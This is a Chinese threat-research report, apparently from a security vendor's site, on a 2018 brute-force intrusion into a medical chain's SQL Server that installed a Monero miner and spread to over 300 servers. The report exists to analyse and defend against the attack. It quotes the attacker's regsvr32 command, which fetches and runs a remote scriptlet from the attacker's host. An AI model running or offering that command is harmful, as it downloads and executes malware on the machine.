产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御验证码
T-Sec 天御文本内容安全
T-Sec 天御视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→
解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
NEW
最新动态
威胁研究
合作伙伴
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云

威胁研究

正文

某连锁医疗机构SQL Server服务器遭黑客入侵，服务器秒变矿机

2018-07-24 11:52:48

近日，腾讯御见威胁情报中心感知到某医院被入侵，并且被植入了挖矿木马。通过分析发现该医院因为SQL Server服务存在弱口令，被黑客爆破1433端口的方式成功入侵。入侵后，黑客利用写入下载命令触发下载恶意脚本，恶意脚本执行后会继续下载挖矿组件，在被入侵的数据库服务器上进行门罗币挖矿操作。

1、概述

对于受害医疗机构来说，如果仅是挖矿行为，危害算是最轻微的，受害企业只是服务器硬件资源被挖矿病毒消耗了。

更为关键的是，入侵者已通过1433端口爆破完全控制这台SQL Server服务器，数据库中的数据可能已被窃取或存在泄露的风险，也就是常说的被“拖库”，之后这些信息可能在黑市上交易。黑客还可以利用这台服务器去入侵局域网内其他电脑，利用被控制的肉鸡电脑发起DDoS攻击，或者干脆运行勒索病毒，破坏服务器的数据，再勒索钱财。

腾讯御见威胁情报中心分析发现，这名入侵者已用同样的手法，入侵了多家单位超过300台服务器，全部被用来挖矿。

2、入侵分析

通过分析发现，该医院被入侵的原因是，黑客利用1433端口批量爆破工具入侵医院服务器，爆破成功后利用写入下载命令触发下载恶意脚本，恶意脚本执行后会继续下载挖矿组件进行挖矿。

（北京某医疗美容医院）

1433端口SQL Server默认端口，用于供SQL Server对外提供服务。黑客们利用sa弱口令，通过密码字典进行猜解爆破登录。由于一些管理员的安全意识薄弱，设置密码简单容易猜解，导致黑客往往能轻松进入服务器。

黑客1433端口爆破成功后，执行以下下载命令，以进行下一步的操作。

regsvr32.exe /u /n /s /i:http://a.869d4fdae.tk/kma.sct scrobj.dll

3、样本分析

下载的Kma.sct通过判断系统版本来分别进行下载木马以及存放路径。

下载后进行解压运行fix.exe。

fix.exe是正常程序，并且带有正规签名。而且fix.exe通过白+黑调用soundbox.dll。

该dll会去解密x.txt，解密的x.txt为矿机，并且在内存中加载执行：

（读取x.txt文件解密）

解密的矿机内容：

挖矿的配置文件：

4、关联分析

对该入侵的C&C进行扩展，我们还发现多家企业300余台服务器被黑客使用同样的方式入侵：

（某集团内部服务器）

（江苏某教学设备有限公司）

此次被入侵地区分布，广东、河北、北京占据前三：

5、总结

虽然该医院目前只是被入侵后进行了挖矿，暂未对该医院造成太大的损失，但是绝不能忽视该次入侵。

不能排除黑客以这台已入侵的服务器为起点，继续在局域网内渗透，通过这台已被控制的服务器去攻击入侵其他电脑。进而在局域网内传播更多勒索病毒、挖矿病毒，进一步窃取机密资料等后续行为，入侵者已经具有彻底破坏该医院业务体系的能力。同时该医院的服务器也可能会作为肉鸡，继续成为黑客入侵其他机器的跳板，或者用来对其他目标进行DDoS攻击。绝不能因为仅仅中了挖矿病毒，而放松网络安全管理。